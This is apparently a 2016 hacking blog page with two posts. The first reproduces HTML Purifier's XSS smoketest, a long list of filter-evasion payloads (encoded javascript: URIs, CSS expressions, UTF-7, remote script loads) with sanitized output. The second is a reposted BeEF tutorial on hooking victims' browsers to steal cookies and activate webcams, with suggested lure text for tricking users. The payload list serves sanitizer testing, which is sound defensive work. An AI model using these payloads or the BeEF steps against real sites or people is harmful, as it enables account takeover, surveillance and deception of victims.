Tuesday, June 7, 2016

HTML Purifier XSS Attacks Smoketest ( http://htmlpurifier.org/live/smoketests/xssAttacks.php)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

NameRawOutputRender
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//-->
» CRIPT>">'>» >

SCRIPT w/Source File


SCRIPT w/Char Code


BASE
»
HREF="javascript:alert('XSS' » );//">

BGSOUND
»
SRC="javascript:alert('XSS') » ;">

BODY background-image
»
BACKGROUND="javascript:alert » ('XSS');">

BODY ONLOAD


                

DIV background-image 1
»
STYLE="background-image: » url(javascript:alert('XSS')) » ">

DIV background-image 2
»
STYLE="background-image: » url(javascript:alert('XS » S'))">

DIV expression
»
expression(alert('XSS'));">

FRAME
»
SRC="javascript:alert('XSS') » ;">

IFRAME


INPUT Image
»
SRC="javascript:alert('XSS') » ;">

IMG w/JavaScript Directive
»
SRC="javascript:alert('XSS') » ;">

IMG No Quotes/Semicolon
»
SRC=javascript:alert('XSS')>

IMG Dynsrc
»
DYNSRC="javascript:alert('XS » S');">

IMG Lowsrc
»
LOWSRC="javascript:alert('XS » S');">

IMG Embedded commands 1
»
SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">
»
src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" />
somecommand.php?somevariables=maliciousc
IMG STYLE w/expression
exp/*»
STYLE='no\xss:noxss("*//*"); » xss:ex/*XSS*//*/* » /pression(alert("XSS"))'>
exp/*
exp/*
List-style-image
  • XSS
  • XSS
  • XSS
IMG w/VBscript
»
SRC='vbscript:msgbox("XSS")' » >

LAYER
»
SRC="http://ha.ckers.org/scr » iptlet.html">

Livescript
»
SRC="livescript:[code]">

US-ASCII encoding
scriptalert(XSS)/script »
scriptalert(XSS)/script
scriptalert(XSS)/script
META
»
CONTENT="0;url=javascript:al » ert('XSS');">

META w/data:URL
»
CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K">

META w/additional URL parameter
»
CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');">

Mocha


OBJECT
»
TYPE="text/x-scriptlet" »
DATA="http://ha.ckers.org/sc »
riptlet.html">


OBJECT w/Embedded XSS
»
classid=clsid:ae24fdae-03c6- »
11d1-8b76-0080c744f389>»
m name=url »
value=javascript:alert('XSS' »
)>


Embed Flash
»
SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED>

STYLE


STYLE w/Comment
»
STYLE="xss:expr/*XSS*/ession » (alert('XSS'))">

STYLE w/Anonymous HTML
»
STYLE="xss:expression(alert( » 'XSS'))">

STYLE w/background-image
»
CLASS=XSS>

STYLE w/background


Stylesheet
»
HREF="javascript:alert('XSS' » );">

Remote Stylesheet 1
»
HREF="http://ha.ckers.org/xs » s.css">

Remote Stylesheet 2


Remote Stylesheet 3
»
Content="» g/xss.css>; REL=stylesheet">

Remote Stylesheet 4


TABLE
»
BACKGROUND="javascript:alert » ('XSS')">

TD
»
BACKGROUND="javascript:alert » ('XSS')">

XML namespace
»
namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> X » SS
<?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
XSS
XSS
XML data island w/CDATA
»
ID=I><![CDATA[» SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> » » DATAFLD=C DATAFORMATAS=HTML>
<IMG »
SRC="javascript:alert('XSS') »
;">

XML data island w/comment
»
SRC="javascript:alert('XSS')">< » /I> » DATASRC="#xss" DATAFLD="B" » DATAFORMATAS="HTML">
»
alt="javas<!-- » -->cript:alert('XSS')" » />
javas<!-- -->cript:alert('XSS')
XML (locally hosted)
»
SRC="http://ha.ckers.org/xss » test.xml" ID=I> » DATASRC=#I DATAFLD=C » DATAFORMATAS=HTML>

XML HTML+TIME
»
prefix="t" » ns="urn:schemas-microsoft-co » m:time"> » namespace="t" » implementation="#default#tim » e2"> » attributeName="innerHTML" » to="XSS" » >
<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">

<?import »
namespace="t" »
implementation="#default#tim »
e2">
Commented-out Block


Cookie Manipulation
»
HTTP-EQUIV="Set-Cookie" » Content="USERID=">

Local .htc file
»
url(http://ha.ckers.org/xss. » htc);">

Rename .js to .jpg


SSI


PHP
»
echo('aler » t("XSS")'); ?>
<? echo('alert("XSS")'); »
?>
JavaScript Includes


                


        

Character Encoding Example
<
%3C
&lt
<
&LT
<
&#60 »

&#060
&#0060

&#00060
&#000 »
060
&#0000060
<
<
& »
#0060;
<
<
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
<
<

< »

<
<
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »

<
<
<
&#X »
0003c;
<
&#X000003c »
;
&#x3C

&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
<
<
&#x000 »
3C;
<
<
& »
#X3C
&#X03C
&#X003C
&#X0003C »

&#X00003C
&#X000003C

&#X3C »
;
<
<
< »

<
<
\x3c »

\x3C
\u003c
\u003C
<
%3C
&lt
<
&L »
T
&LT;
<
<
<

& »
lt;
<
<
<
<
< »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »
<
<
<
<
<
&lt »
;

<
<
<
<
<
 »
<
<
<
<
<
&lt »
;
<
<
<
<
<
& »
lt;

<
<
<
<
&lt »
;
<
\x3c
\x3C
\u003c
\u00 »
3C
< %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive
»
SRC=JaVaScRiPt:alert('XSS')>

HTML Entities
»
SRC=javascript:alert("X » SS")>

Grave Accents
»
SRC=`javascript:alert("RSnak » e says, 'XSS'")`>
»
src="%60javascript%3Aalert(" » alt="`javascript:alert(&quot » ;RSnake" />
`javascript:alert("RSnake
Image w/CharCode
»
SRC=javascript:alert(String. » fromCharCode(88,83,83))>

UTF-8 Unicode Encoding
»
SRC=java&# » 115;crip& » #116;:ale& » #114;t('X&# » 83;S')>

Long UTF-8 Unicode w/out Semicolons
»
SRC=&#0000106&#0000097&#0000 » 118&#0000097&#0000115&#00000 » 99&#0000114&#0000105&#000011 » 2&#0000116&#0000058&#0000097 » &#0000108&#0000101&#0000114& » #0000116&#0000040&#0000039&# » 0000088&#0000083&#0000083&#0 » 000039&#0000041>

DIV w/Unicode
»
STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029">

Hex Encoding w/out Semicolons
»
SRC=&#x6A&#x61&#x76&#x61&#x7 » 3&#x63&#x72&#x69&#x70&#x74&# » x3A&#x61&#x6C&#x65&#x72&#x74 » &#x28&#x27&#x58&#x53&#x53&#x » 27&#x29>

UTF-7 Encoding
»
HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » +ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes
\";alert('XSS');//
\";alert('XSS');//
\";alert('XSS');//
End title tag



                

STYLE w/broken up JavaScript


Embedded Tab
»
SRC="jav\tascript:alert('XSS' » );">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Encoded Tab
»
SRC="jav ascript:alert( » 'XSS');">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Newline
»
SRC="jav ascript:alert( » 'XSS');">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Carriage Return
»
SRC="jav ascript:alert( » 'XSS');">
»
src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />
jav ascript:alert('XSS');
Multiline w/Carriage Returns
»
p t : a l e r t ( ' X S S ' » ) " >
»
src="j%20a%20v%20a%20s%20c%2 » 0r%20i%20p%20t%20%3A%20a%20l » %20e%20r%20t%20(%20'%20X%20S » %20S%20'%20)" alt="j a v a s » c r i p t : a l e r t ( ' X » S" />
j a v a s c r i p t : a l e r t ( ' X S
Null Chars 1
»
SRC=java\0script:alert("XSS") » >

Null Chars 2
&\0
IPT>alert("XSS")\0 » IPT>
&
&
Spaces/Meta Chars
»
javascript:alert('XSS');">

Non-Alpha/Non-Digit


Non-Alpha/Non-Digit Part 2
»
onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")>

No Closing Script Tag


Evade Regex Filter 1


Evade Regex Filter 2


Evade Regex Filter 3


Evade Regex Filter 4


Evade Regex Filter 5


Filter Evasion 1
PT »
SRC="http://ha.ckers.org/xss »
.js">
PT »
SRC="http://ha.ckers.org/xss »
.js">
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2


IP Encoding
»
HREF="http://66.102.7.147/"> » XSS
»
href="http://66.102.7.147/"> » XSS URL Encoding
»
HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS
XSS
Dword Encoding
»
HREF="http://1113982867/">XS » S
XSS
Hex Encoding
»
HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS
XSS
Octal Encoding
»
HREF="http://0102.0146.0007. » 00000223/">XSS
XSS
Mixed Encoding
»
HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS
»
href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS Protocol Resolution Bypass
»
HREF="//www.google.com/">XSS »
XSS
Firefox Lookups 1
XSS
XSS
Firefox Lookups 2
»
HREF="http://ha.ckers.org@go » ogle">XSS
»
href="http://google">XSS Firefox Lookups 3
»
HREF="http://google:ha.ckers » .org">XSS
»
href="http://google">XSS Removing Cnames
»
HREF="http://google.com/">XS » S
XSS
Extra dot for Absolute DNS
»
HREF="http://www.google.com. » /">XSS
XSS
JavaScript Link Location
»
HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS
XSS
Content Replace
»
HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A>
»
href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a>
 

Beatles - Yellow Submarine



http://fortay.teknikata.com/infosec/Web%20App%20Hacking%20%28Hackers%20Handbook%29.pdf

Sunday, June 5, 2016

I will introduce you to new hacking tools and techniques, though, one tool that we will be using in all of those areas is called the Browser Exploitation Framework, or BeEF (don't ask me what the lowercase "e" stands for).
Similar to Metasploit, BeEF is a framework for launching attacks. Unlike Metasploit, it is specific to launching attacks against web browsers. In some cases, we will be able to use BeEF in conjunction with Metasploit to launch particular attacks, so I think its time for us to become familiar with it.
BeEF was developed by a group of developers led by Wade Alcorn. Built on the familiar Ruby on Rails platform, BeEF was developed to explore the vulnerabilities in browsers and test them. In particular, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.
Step 1: Start Cooking BeEF
BeEF is built into Kali Linux, and it can be started as a service and accessed via a web browser on your localhost. So let's start by firing up Kali and cooking a bit of BeEF. Start the BeEF service by going to "Applications" -> "Kali Linux" -> "System Services" -> "BeEF" -> "beef start."
Step 2: Opening a Browser to BeEF
The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:
http://localhost:3000/ui/authentication
The default credentials are "beef" for both username and password.
Great! Now you have successfully logged into BeEF and are ready to begin using this powerful platform to hack web browsers.
Note that in the screenshot below that my local browser, 127.0.0.1, appears in the left hand "Hooked Browsers" explorer after I clicked on the link to the demo page. BeEF also displays its "Getting Started" window to the right.
Step 3: Viewing Browser Details
If I click on the local browser, it will provide with more choices to the right including a "Details" window where we can get all the particulars of that browser. Since I am using the Iceweasel browser built into Kali, which is built upon Firefox, it shows me that the browser is Firefox.
It also shows me the version number (24), the platform (Linux i686), any components (Flash, web sockets, etc.), and more information that we will be able to use in later web application hacks.
Step 4: Hooking a Browser
The key to success with BeEF is to "hook" a browser. This basically means that we need the victim to visit a vulnerable web app. This injected code in the "hooked" browser then responds to commands from the BeEF server. From there, we can do a number of malicious things on the victim's computer.
BeEF has a JavaScript file called "hook.js," and if we can get the victim to execute it in a vulnerable web app, we will hook their browser! In future tutorials, we will look at multiple ways to get the victim's browser hooked.
In the screenshot below, I have "hooked" an Internet Explorer 6 browser on an old Windows XP on my LAN at IP 192.168.89.191.
Step 5: Running Commands in the Browser
Now, that we have hooked the victim's browser, we can use numerous built-in commands that can executed from the victim's browser. Below are just a few examples; there are many others.
  • Get Visited Domains
  • Get Visited URLs
  • Webcam
  • Get All Cookies
  • Grab Google Contacts
  • Screenshot
In the screenshot below, I selected the "Webcam" command that many of you may be interested in. As you can see, when I execute this command, an Adobe Flash dialog box will pop up on the screen of the user asking, "Allow Webcam?" If they click "Allow," it will begin to return pictures from the victim's machine to you.
Of course, the text can be customized, so be imaginative. For instance, you could customize the button to say "You have just won the lottery! Click here to collect your winnings!" or "Your software is out of date. Click here to update and keep your computer secure." Other such messages might entice the victim to click on the box.
Step 6: Getting Cookies
Once we have the browser hooked, there is almost unlimited possibilities of what we can do. If we wanted the cookies of the victim, we can go to "Chrome Extensions" and select "Get All Cookies" as shown in the screenshot below.
When we click on the "Execute" button to the bottom right, it will begin collecting all the cookies from the browser. Obviously, once you have the user's cookies, you are likely to have access to their websites as well.
BeEF is an extraordinary and powerful tool for exploiting web browsers. In addition to what I have shown you here, it can also be used to leverage operating system attacks. We will be using it and other tools in my new series on hacking web applications, mobile devices, and Facebook, so keep coming back, my greenhorn hackers.
References: @occupytheweb from Null Byte 

http://www.hackinsight.org/news,222.html